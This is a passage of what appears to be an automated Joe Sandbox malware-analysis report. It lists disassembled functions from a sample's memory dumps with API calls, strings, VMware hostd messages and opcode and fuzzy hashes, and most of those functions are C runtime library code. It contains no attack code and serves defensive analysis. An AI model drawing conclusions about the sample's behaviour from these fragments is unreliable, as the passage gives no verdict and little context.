                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 2565136772-3242537097
                                          • Opcode ID: 63f1afd2a164db026a7bc0f61f685e6ac9e8f08eb168543d630ff1e9f8918369
                                          • Instruction ID: ec002dd3a094aac3de70e8f5173f8081750d39d4efa771fd233802485aa60146
                                          • Opcode Fuzzy Hash: 63f1afd2a164db026a7bc0f61f685e6ac9e8f08eb168543d630ff1e9f8918369
                                          • Instruction Fuzzy Hash: A701B175E00782AFDF108BB4BE0CB763AB9AB9B7427000516F924DA208EBE4C414D672
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D170DB2 Relevance: 19.8, APIs: 13, Instructions: 305COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D170E1D
                                          • DName::operator+.LIBCMT ref: 6D170F60
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                          • DName::operator+.LIBCMT ref: 6D170FAC
                                          • DName::operator+.LIBCMT ref: 6D170FBB
                                          • DName::operator+.LIBCMT ref: 6D170F0B
                                            • Part of subcall function 6D17262E: DName::operator=.LIBVCRUNTIME ref: 6D1726BD
                                          • DName::operator+.LIBCMT ref: 6D1710E7
                                          • DName::operator=.LIBVCRUNTIME ref: 6D171127
                                          • DName::DName.LIBVCRUNTIME ref: 6D17113F
                                          • DName::operator+.LIBCMT ref: 6D17114E
                                          • DName::operator+.LIBCMT ref: 6D17115A
                                            • Part of subcall function 6D17262E: Replicator::operator[].LIBCMT ref: 6D17266B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                          • String ID:
                                          • API String ID: 1026175760-0
                                          • Opcode ID: 1ab86e62915cc9ebbb6f7520ef6ea7242342e1d3fc6b72cf953f8c63f091a08b
                                          • Instruction ID: aaa1e5b852b934a1fcac2d99f0fe05b673c66eb0fd318cebd67ed497008dc833
                                          • Opcode Fuzzy Hash: 1ab86e62915cc9ebbb6f7520ef6ea7242342e1d3fc6b72cf953f8c63f091a08b
                                          • Instruction Fuzzy Hash: C8C1B0B19043499FDB20CFA4C855BEEBBF9BF19304F00845DE259E7298EBB59685CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D184AD8 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 6D184B1C
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185284
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185296
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852A8
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852BA
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852CC
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852DE
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852F0
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185302
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185314
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185326
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185338
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D18534A
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D18535C
                                          • _free.LIBCMT ref: 6D184B11
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D184B33
                                          • _free.LIBCMT ref: 6D184B48
                                          • _free.LIBCMT ref: 6D184B53
                                          • _free.LIBCMT ref: 6D184B75
                                          • _free.LIBCMT ref: 6D184B88
                                          • _free.LIBCMT ref: 6D184B96
                                          • _free.LIBCMT ref: 6D184BA1
                                          • _free.LIBCMT ref: 6D184BD9
                                          • _free.LIBCMT ref: 6D184BE0
                                          • _free.LIBCMT ref: 6D184BFD
                                          • _free.LIBCMT ref: 6D184C15
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: e32424dac813b0e9da87828d0afbd4a771110631a921372cf23b1ad17f49aed9
                                          • Instruction ID: f492e6792aa7dbe86e5ad720167155cf57ed1708952ab2a4fac1c536411434ea
                                          • Opcode Fuzzy Hash: e32424dac813b0e9da87828d0afbd4a771110631a921372cf23b1ad17f49aed9
                                          • Instruction Fuzzy Hash: 00316D31608702EFEB21CB35E940F66B3EEEF08314F11446AE669D7169DFB2E8409B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00341730 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                          • Warning.VMWAREBASE(Received GLOBAL command: %s,?), ref: 0034173E
                                            • Part of subcall function 00343B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00343B96
                                          Strings
                                          • failed., xrefs: 003417F8
                                          • Command '%s%s' not authorized for hostd contact, xrefs: 00341778
                                          • Global command %s%s to non-host agent targets not supported, xrefs: 003417AE
                                          • User not authorized for host agent contact, xrefs: 003417BB
                                          • hostd connection to %s%s, xrefs: 00341804
                                          • ha-nfc, xrefs: 00341797
                                          • vmware-hostd, xrefs: 003417E5
                                          • Received GLOBAL command: %s, xrefs: 00341739
                                          • Invalid arguments to '%s', xrefs: 0034174E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning
                                          • String ID: failed.$Command '%s%s' not authorized for hostd contact$Global command %s%s to non-host agent targets not supported$Invalid arguments to '%s'$Received GLOBAL command: %s$User not authorized for host agent contact$ha-nfc$hostd connection to %s%s$vmware-hostd
                                          • API String ID: 2415109466-3597576495
                                          • Opcode ID: ed72bf79834400fd3c593f01fc3d8616575154a1d8317ed46dd854995b0e34e8
                                          • Instruction ID: 8411f25515cc00f3c83328a73ce50014c06290cf5aa70eac33dfea33752c50bb
                                          • Opcode Fuzzy Hash: ed72bf79834400fd3c593f01fc3d8616575154a1d8317ed46dd854995b0e34e8
                                          • Instruction Fuzzy Hash: 54210A36BC0B4037E7231599AC07FD77BD9C781B66F050026FB186E6D2D291799092E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D185365 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: bc4447c34fd9a0c65d2cf03fc6489690101ef543a007656e01a56337b3f4925f
                                          • Instruction ID: a6485a6752dc61bad7bb06cbb78e841cdf0ac33077d4dacaa11fba664923b896
                                          • Opcode Fuzzy Hash: bc4447c34fd9a0c65d2cf03fc6489690101ef543a007656e01a56337b3f4925f
                                          • Instruction Fuzzy Hash: FDC14672D44205BFEB20CBA8DC41FEE77F8AB09704F154155FA1AFB286D6F199409B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17EB7D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 5dc6cf248c709dd3ab2f7f3ddeb9f47a8e9709adc4d4f834366035da2e6c153c
                                          • Instruction ID: 5aa255fcc6bc13940a0e84c8da76af572ee8ba65a07c6e405a9830523153a5c0
                                          • Opcode Fuzzy Hash: 5dc6cf248c709dd3ab2f7f3ddeb9f47a8e9709adc4d4f834366035da2e6c153c
                                          • Instruction Fuzzy Hash: 4DC1CE70A082469BDF25CF98C880BEDBBF0BF5A314F114059E954EB2A9D7F49A41CB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D189AFB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D1897B4: CreateFileW.KERNEL32(00000000,00000000,?,6D189BA4,?,?,00000000,?,6D189BA4,00000000,0000000C), ref: 6D1897D1
                                          • GetLastError.KERNEL32 ref: 6D189C0F
                                          • __dosmaperr.LIBCMT ref: 6D189C16
                                          • GetFileType.KERNEL32(00000000), ref: 6D189C22
                                          • GetLastError.KERNEL32 ref: 6D189C2C
                                          • __dosmaperr.LIBCMT ref: 6D189C35
                                          • CloseHandle.KERNEL32(00000000), ref: 6D189C55
                                          • CloseHandle.KERNEL32(6D181DE0), ref: 6D189DA2
                                          • GetLastError.KERNEL32 ref: 6D189DD4
                                          • __dosmaperr.LIBCMT ref: 6D189DDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 47c87351c758cd5f185c8c2eb59edc90d387da5fbb015b54556f27dbbd386165
                                          • Instruction ID: f07a18778789ae032414a35dc5fd3e5802727d375a6849f9321ee772b34f3a9a
                                          • Opcode Fuzzy Hash: 47c87351c758cd5f185c8c2eb59edc90d387da5fbb015b54556f27dbbd386165
                                          • Instruction Fuzzy Hash: 51A13432A181598FCF19DF68D8A1BAE3BB1AF07324F15014DF815EF296CBB58912CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D148C50 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148C86
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148CA8
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148CC8
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148CEF
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148D68
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D148DB4
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6D148DCE
                                            • Part of subcall function 6D172FF3: _free.LIBCMT ref: 6D173006
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148E63
                                          • std::_Facet_Register.LIBCPMT ref: 6D148E70
                                            • Part of subcall function 6D1666EC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D1666F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister_freestd::invalid_argument::invalid_argument
                                          • String ID: bad locale name
                                          • API String ID: 1536214518-1405518554
                                          • Opcode ID: c99ef5cad7dedb80e4b684875ad5d6e16bfd9ddc03802c6f0b574058fa06d313
                                          • Instruction ID: b8801f6ec26f9f2e84f504151b598279c9658689d0a84cdcaa67680c4821f868
                                          • Opcode Fuzzy Hash: c99ef5cad7dedb80e4b684875ad5d6e16bfd9ddc03802c6f0b574058fa06d313
                                          • Instruction Fuzzy Hash: 4D618BB1D04249DFEB10CFA8D944BAEBBB4BF14314F158159E905AB348E7B4E905CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39C8C5 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 178COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: operator+shared_ptr$NameName::
                                          • String ID: L 9n$std::nullptr_t$std::nullptr_t $volatile$volatile
                                          • API String ID: 2894330373-938447606
                                          • Opcode ID: 89c0f033bb3f35da54759615a6138dcc3418a2c719962967d0e831ca1721d7ce
                                          • Instruction ID: 4f748efd131bf19eda8b7041baec6e2553fa80433b9a338009df8af5c8a79168
                                          • Opcode Fuzzy Hash: 89c0f033bb3f35da54759615a6138dcc3418a2c719962967d0e831ca1721d7ce
                                          • Instruction Fuzzy Hash: 27615BB580410AEFDB00CFE9C854AEEBBBDFB06344F50865AE4649F250F7329645EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39B4E1 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 73COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Name::operator+shared_ptr
                                          • String ID: 8 9n$8 9n$char $int $long $short $unsigned
                                          • API String ID: 3919194733-213831689
                                          • Opcode ID: 9ca4425b4abe1946c9fed63144fb9a88f759c445c0c716a6c044e75868d08e07
                                          • Instruction ID: 02b23c4fe577b96e0ead6692ad804f97c7cb866bd550f49b6e5df4640f9c54b1
                                          • Opcode Fuzzy Hash: 9ca4425b4abe1946c9fed63144fb9a88f759c445c0c716a6c044e75868d08e07
                                          • Instruction Fuzzy Hash: BC21F5B4900609EFCB00CFE8D595BEEBBB9BB06308F404589D521AB384E7719648EF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16DFA8 Relevance: 16.9, APIs: 11, Instructions: 362COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                          • String ID:
                                          • API String ID: 1464150960-0
                                          • Opcode ID: 4768fed399e28774b80c17a704dc7e9d8e8da035879a34ba2354eaa24ac06724
                                          • Instruction ID: 13ebe400905204eb1c89925838b038c91204926c69bed6dd9ebd9b9f85367dfb
                                          • Opcode Fuzzy Hash: 4768fed399e28774b80c17a704dc7e9d8e8da035879a34ba2354eaa24ac06724
                                          • Instruction Fuzzy Hash: D5E14DB1D0428A9ADB01CFA9C849BFEBBB4EB15304F11C21AD521FA249D7F49715CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E3942E0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 275COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateScopeTableHandlers.LIBCMT ref: 6E3943F4
                                          • __FindPESection.LIBCMT ref: 6E394411
                                          • VirtualQuery.KERNEL32(?,|+uy,0000001C,79752B7C,?,?,?), ref: 6E3944F6
                                          • __FindPESection.LIBCMT ref: 6E394533
                                          • _ValidateScopeTableHandlers.LIBCMT ref: 6E394553
                                          • __FindPESection.LIBCMT ref: 6E39456D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                          • String ID: d.9n$|+uy$|+uyo
                                          • API String ID: 2529200597-3117658051
                                          • Opcode ID: 02de1dffc38b24eb541fe534f210f3bfb781f8f480e91e1d22873ba7ec3c7dfc
                                          • Instruction ID: 8d1a1b6219e9f32c52ed126ee50ff9f91fafee743f11dcc42420d714f800a253
                                          • Opcode Fuzzy Hash: 02de1dffc38b24eb541fe534f210f3bfb781f8f480e91e1d22873ba7ec3c7dfc
                                          • Instruction Fuzzy Hash: DDA1BCB5E006169FDB14CFD8D9C07AEB7B9EB49314F214629D828A7240F731EC46DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17262E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 186COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Replicator::operator[].LIBCMT ref: 6D17266B
                                          • DName::operator=.LIBVCRUNTIME ref: 6D1726BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator=Replicator::operator[]
                                          • String ID: @$generic-type-$template-parameter-
                                          • API String ID: 3211817929-1320211309
                                          • Opcode ID: 29ce6d3dfdf9c3a9cdade8ef9a98a8f0e77cd967367d2de881c6335a469b5d7a
                                          • Instruction ID: 77829a7bfff64e3dfa5f337e40302401fe8eeeeff251ad17f4282750d61b6b79
                                          • Opcode Fuzzy Hash: 29ce6d3dfdf9c3a9cdade8ef9a98a8f0e77cd967367d2de881c6335a469b5d7a
                                          • Instruction Fuzzy Hash: 5761D371D0420ADFDB21CFA4D940BFEBBB8AF29310F51401AD615B72A4DBF89546CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397A60 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 131COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Attempted a typeid of nullptr pointer!, xrefs: 6E397BCE
                                          • Bad read pointer - no RTTI data!, xrefs: 6E397B9A
                                          • Bad dynamic_cast!, xrefs: 6E397B34
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Offset
